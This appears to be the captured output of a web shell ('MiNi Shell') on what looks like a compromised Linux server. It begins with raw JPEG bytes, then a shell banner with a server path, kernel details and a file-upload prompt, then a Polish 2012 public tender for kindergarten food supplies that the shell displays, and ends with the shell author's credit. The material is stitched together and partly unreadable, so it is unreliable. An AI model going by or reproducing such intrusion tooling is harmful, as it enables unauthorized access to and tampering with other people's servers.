JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/492248-N-2012.html

<p class="kh_header"><b>Komorowo: Zakup środków żywności dla Przedszkola Samorządowego w Komorowie</b><br>
<b>Numer ogłoszenia: 492248 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Samorządowe w Komorowie , ul. płk. dypl. L. Bociańskiego 2, 07-310 Komorowo, woj. mazowieckie, tel. 29 644 01 88, faks 29 644 01 88.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup środków żywności dla Przedszkola Samorządowego w Komorowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Przedszkola Samorządowego w Komorowie na rok 2013.
Zamawiający nie dopuszcza składania ofert częściowych. 
Dostawa będzie realizowana codziennie, tj. we wszystkie dni tygodnia za wyjątkiem sobót, niedziel i świąt, transportem Wykonawcy i na jego koszt do siedziby Zamawiającego, tj. do kuchni Przedszkola Samorządowego w Komorowie. 
Dostawa będzie realizowana w godzinach ustalonych z Zamawiającym. O każdej dostawie Zamawiający powiadomi Wykonawcę telefonicznie lub faksem, najpóźniej w dniu poprzedzającym dzień planowanej dostawy do godziny 11.00 oraz wskaże zamawiane produkty z podaniem ilości i miejsca dostawy. Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
Dostawa artykułów żywnościowych w miesiącu lipcu i sierpniu nie będzie realizowana.
Zamawiający zastrzega, że z przyczyn niezależnych od niego, może zostać ograniczona ilość dostarczanych produktów lub Zamawiający może zrezygnować całkowicie z dostawy produktów żywnościowych.
Ilość produktów może ulec zmianie.
Mięso, produkty mięsne, wędliny 
1	Karkówka z kością 	330 kg
2	Schab wieprzowy z kością	70 kg
3	Łopatka wieprzowa bez kości 	40 kg
4	Szynka surowa bez kości 	80 kg
5	Filet z kurczaka 	90 kg
6	Ćwiartka z kurczaka 	60 kg
7	Porcje rosołowe	40 kg
8	Boczek wędzony 	30 kg
9	Kiełbasa podwawelska 	15 kg
10	Polędwica sopocka 	20 kg
11	Szynka wędzona 	20 kg
12	Schab pieczony	15 kg
13	Parówki odtłuszczane 	50 kg
Warzywa
1	Ziemniaki 	3000 kg
2	Marchew 	400 kg
3	Buraki korzeń	250 kg
4	Por korzeń	140 kg
5	Seler korzeń	150 kg
6	Pietruszka - korzeń	90 kg
7	Pomidory 	70 kg
8	Ogórek świeży 	80 kg
9	Ogórek kiszony 	100 kg
10	Kapusta biała 	200 kg
11	Kapusta kiszona 	80 kg
12	Kapusta pekińska 	50 kg
13	Kapusta czerwona 	50 kg
14	Kapusta włoska 	30 szt.
15	Cebula 	130 kg
16	Rzodkiewka (1 pęczek=10 szt.)	100 pęczków
17	Sałata 	250 szt.
18	Kalafior 	50 szt.
19	Pieczarki 	30 kg
20	Papryka świeża	30 kg
21	Pietruszka - natka (1 pęczek=7 szt.)	40 pęczków
22	Szczypior (1 pęczek=7 szt.)	100 pęczków
23	Koperek (1 pęczek=7 szt.)	40 pęczków
Owoce 
1	Jabłka 	1200 kg
2	Pomarańcze 	250 kg
3	Mandarynki 	200 kg
4	Kiwi 	140 kg
5	Winogrona 	80 kg
6	Banany 	230 kg
7	Śliwki 	10 kg
8	Gruszki 	90 kg
9	Arbuz 	90 kg
10	Wiśnie 	20 kg
11	Truskawki 	30 kg
Woda
1	Woda naturalna niegazowana 18,9 l	40 szt.
Pieczywo
1	Długa bułka 350g	500 szt.
2	Chleb biały 500g	900 szt.
3	Chleb razowy 900g	80 szt.
4	Chleb staropolski 600g	80 szt.
5	Chałka maślana 350g	100 szt.
6	Strucla serowa 	100 szt.
7	Bułki drożdżowe z serem	400 szt.
8	Pączki 	420 szt.
Nabiał, artykuły mleczarskie
1	Jogurt owocowy 150 g	550 szt.
2	Jogurt owocowy 500 g	150 szt.
3	Masło 200g 82% tłuszczu	120 szt.
4	Mleko 0,9L 2%	3200 szt.
5	Twaróg półtłusty	100 kg
6	Ser topiony Hochland 140 g	70 szt.
7	Ser żółty twardy	35 kg
8	Serek homogenizowany waniliowy 150 g	600 szt.
9	Śmietana 18% kwaśna 0,4 l	1200 szt.
Produkty ogólnospożywcze
1	Bułka tarta	60 kg
2	Cukier	350 kg
3	Mąka pszenna Kurpiowska typ 500	250 kg
4	Mąka ziemniaczana	20 kg
5	Herbata 100g	60 szt.
6	Kawa Inka150g	35 szt.
7	Majeranek 10g	40 szt.
8	Przyprawa Magii 0,2l	25 szt.
9	Dżem truskawkowy 280g	50 szt.
10	Dżem brzoskwiniowy 280g	30 szt.
11	Olej uniwersalny 1l	180 szt.
12	Liście laurowe 6g	150 szt.
13	Pasztet z drobiu 225g	80 szt.
14	Ryż	60 kg
15	Kisiel 58g	180 szt.
16	Koncentrat pomidorowy 30% 190g	100 szt.
17	Majonez 320 ml	100 szt.
18	Miód naturalny 400g	30 szt.
19	Przyprawa 200g typu Kucharek, Vegeta itp.	80 szt.
20	Rosołki z drobiu 60g	150 szt.
21	Ciastka - delicje 	15 kg
22	Ciastka - pierniki z czekoladą	10 kg
23	Ciastka - pierniki lukrowane	10 kg
24	Ciastka - markizy	15 kg
25	Wafelki	20 kg
26	Pieprz ziołowy 15g	45 szt.
27	Pieprz naturalny mielony 14g	50 szt.
28	Kasza manna	20 kg
29	Kasza jęczmienna średnia	30 kg
30	Kasza gryczana	40 kg
31	Kwasek cytrynowy 20g	50 szt.
32	Ketchup łagodny 500g typu Pudliszki	30 szt.
33	Budyń czekoladowy 64g	80 szt.
34	Budyń śmietankowy 40g	100 szt.
35	Budyń malinowy 64g	100 szt.
36	Baton waflowy w czekoladzie 34g	500 szt.
37	Barszcz biały 66g	70 szt.
38	Brzoskwinie w puszce 820g	250 szt.
39	Czosnek suszony 15g	50 szt.
40	Cynamon 20g	10 szt.
41	Cukier waniliowy 32 g	90 szt.
42	Cukier puder 500g	15 szt.
43	Galaretka owocowa 75g	400 szt.
44	Filet śledziowy w pomidorach 170g	70 szt.
45	Groszek konserwowy 400g	90 szt.
46	Chrzan delikatesowy 190g	20 szt.
47	Krem czekoladowy Nutella 230g	50 szt.
48	Kakao naturalne 200g	20 szt.
49	Makaron gwiazdka 250g	40 szt.
50	Makaron świderki 500g	80 szt.
51	Makaron krajanka 200g	40 szt.
52	Musztarda stołowa 190g	10 szt.
53	Proszek do pieczenia 30g	20 szt.
54	Szczaw w słoiku 280g	50 szt.
55	Sól drobna kujawska	50 kg
56	Sos koperkowo ziołowy w proszku 9g	150 szt.
57	Sok z marchwi Kubuś 1l	250 szt.
58	Płatki Nestle gold flakes 250g	50 szt.
59	Płatki nestle chocapic 250g	70 szt.
60	Płatki nesquik zbożowy 250g	60 szt.
61	Płatki kukurydziane 250g	60 szt.
62	Fasola średnia drobna	30 kg
60	Groch łuskany połówki	20 kg
63	Syrop wiśniowy 440ml	180 szt.
64	Syrop pomarańczowy 440 ml	30 szt.
65	Syrop truskawkowy 440 ml	50 szt.
66	Syrop malinowy 440 ml	50 szt.
67	Jajka 	50 szt.
68	Drożdże świeże 100g	30 szt.
Ryby i mrożonki
1	Ryby mrożone - miruna	120 kg
2	Ryby mrożone - dorsz	40 kg
3	Fasolka szparagowa - mrożonka 450g	120 szt.
4	Brokuły mrożone 450g	120 szt.
5	Kalafior mrożony 450 g	70 szt.
6	Mieszanka owocowa 	60 kg
7	Truskawki mrożone 	50 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie Wykonawcy zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt 7 ustawy polegającego na powtórzeniu tego samego rodzaju zamówienia zgodnego z przedmiotem zamówienia podstawowego, o wartości nie większej niż 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany postanowień niniejszej mowy:
1)	 w zakresie cen w przypadku ustawowej zmiany stawki podatku VAT,
2)	 w przypadku zakończenia produkcji lub wycofania z rynku wyrobu będącego przedmiotem zamówienia dopuszcza się zmianę na nowy produkt o tych samych właściwościach i parametrach lub lepszych po cenie jednostkowej zaoferowanej w ofercie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaostrowmaz.home.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.gminaostrowmaz.home.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2012 godzina 10:30, miejsce: Sekretariat Urzędu Gminy Ostrów Mazowiecka, ul. gen. Władysława Sikorskiego 5, 07-300 Ostrów Mazowiecka, pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com